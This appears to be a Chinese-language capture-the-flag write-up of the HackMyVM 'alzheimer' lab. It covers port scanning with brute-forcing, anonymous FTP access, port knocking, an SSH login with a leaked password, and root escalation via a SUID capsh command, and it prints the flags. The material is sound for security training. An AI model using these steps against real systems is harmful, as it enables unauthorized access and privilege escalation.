hackmyvm-alzheimer

λ zscan -t 192.168.69.20 -p 1-65535

[ ]2025/03/29 14:34:50 本次扫描用户屏蔽的端口:[25 110 9100 9101 9102 9103][+]2025/03/29 14:34:50 hydra模块已开启，开始监听暴力破解任务[ ]2025/03/29 14:34:50 当前已开启的hydra模块为：[ssh rdp ftp smb telnet mysql mssql oracle postgresql mongodb redis]
[+]2025/03/29 14:34:51 Domain、IP、Port、URL、Hydra引擎已准备就绪
[+]2025/03/29 14:34:51 所有扫描任务已下发完毕

ftp://192.168.69.20         ftp                        Length:20,Version:3.0.3,Digest:"220(vsFTPd3.0.3)rn",DeviceType:v,Port:21,ProductName:vsftpd,OperatingSystem:Unix
ssh://192.168.69.20         ssh                        Version:7.9p1Debian10+deb10u2,OperatingSystem:Linux,Port:22,ProductName:OpenSSH,Digest:"SSH-2.0-OpenSSH_7.9p1D,Length:41,Info:protocol2.0

[+] ftp 192.168.69.20:21:anonymous anonymous
[->].
[->]..
[->].secretnote.txt
[+] ftp 192.168.69.20:21:ftp ftp
[->].
[->]..
[->].secretnote.txt
ftp://192.168.69.20         CrackSuccess               Username:ftp,Password:ftp,Length:0
http://192.168.69.20                                   Digest:"Ionlyrememberthatwa,Length:304,Port:80

‍

扫描开放了21 22 80

先看看txt内容

I need to knock this ports and
one door will be open!
1000
2000
3000
Ihavebeenalwayshere!!!
Ihavebeenalwayshere!!!

提示是需要knock

knockd 开启防火墙

通过查阅相关资料

使用 knock 管理防火牆相關行為 - https://linux.vbird.org/linux_server/others/knockd.php

knockd 主要的目的是希望可以動態的修改防火牆規則，他的運作流程是這樣的：      伺服器端的防火牆規則中先開放三個左右的埠口，這些埠口沒有被其他程式啟用，且可由 knockd 所偵測；     用戶端若依照設定的順序依序的連線到這三個埠口時， knockd 將進行動態防火牆規則的設定     防火牆規則被修改，且 knockd 持續進行偵測；     當用戶端讓 knockd 等候逾時，或者是用戶端離線後，剛剛步驟三的防火牆規則將會被移除。  如此一來，當我在非固定 IP 的網段想要連線到伺服器時，就可以透過這個機制來處理啦！ 

‍

/usr/bin/knock 192.168.69.20 1000 2000 3000 -v -d 1000

敲了门似乎没什么区别

先看看80端口

f12源代码里还有一个morse编码 解码后是OTHING

按提示先扫一下，后缀一定是txt

扫了什么也没有，使用下这个密码登ssh,不对，使用前面的txt试试看

Ihavebeenalwayshere!!!

发现是密码，拿下flag HMVrespectmemories

看下提权

id似乎没有提权能力

suid看到有一个/usr/sbin/capsh

提权方法是/usr/sbin/capsh --gid=0 --uid=0 --

拿下flag -HMVlovememories

摘要总结：

1. 扫描结果

   • 目标IP：192.168.69.20
   • 开放端口：21（FTP）、22（SSH）、80（HTTP）
   • FTP服务：vsFTPd 3.0.3（允许匿名登录和用户ftp/ftp），发现文件.secretnote.txt。
   • SSH服务：OpenSSH 7.9p1（运行于Linux系统）。
   • HTTP服务：返回部分提示信息“Ionlyrememberthatwa...”。

2. FTP文件内容

   • .secretnote.txt提示需通过端口敲门（knock）激活隐藏服务：

     I need to knock this ports and one door will be open!   1000   2000   3000   Ihavebeenalwayshere!!!   

3. 端口敲门

   • 使用命令knock 192.168.69.20 1000 2000 3000 -v -d 1000，但未观察到明显变化。

4. HTTP线索

   • 网页源代码包含Morse编码“OTHING”，结合FTP文件内容推测密码为Ihavebeenalwayshere!!!。

5. SSH登录

   • 使用用户名ftp和密码Ihavebeenalwayshere!!!成功登录，获取第一个Flag：
     HMVrespectmemories

6. 提权操作

   • 发现SUID权限的/usr/sbin/capsh，通过命令提权：

     /usr/sbin/capsh --gid=0 --uid=0 -- 

   • 获取root权限，最终Flag：
     HMVlovememories

关键步骤：

• 利用FTP匿名登录获取敲门端口顺序和SSH密码。
• 通过端口敲门尝试激活潜在服务（实际可能无需此步骤）。
• 直接使用FTP文件中密码登录SSH，并利用SUID程序提权。

结论：

成功通过FTP信息泄露获取SSH凭据，并利用配置漏洞提权至root。

原文始发于微信公众号（BlueIris）：hackmyvm-alzheimer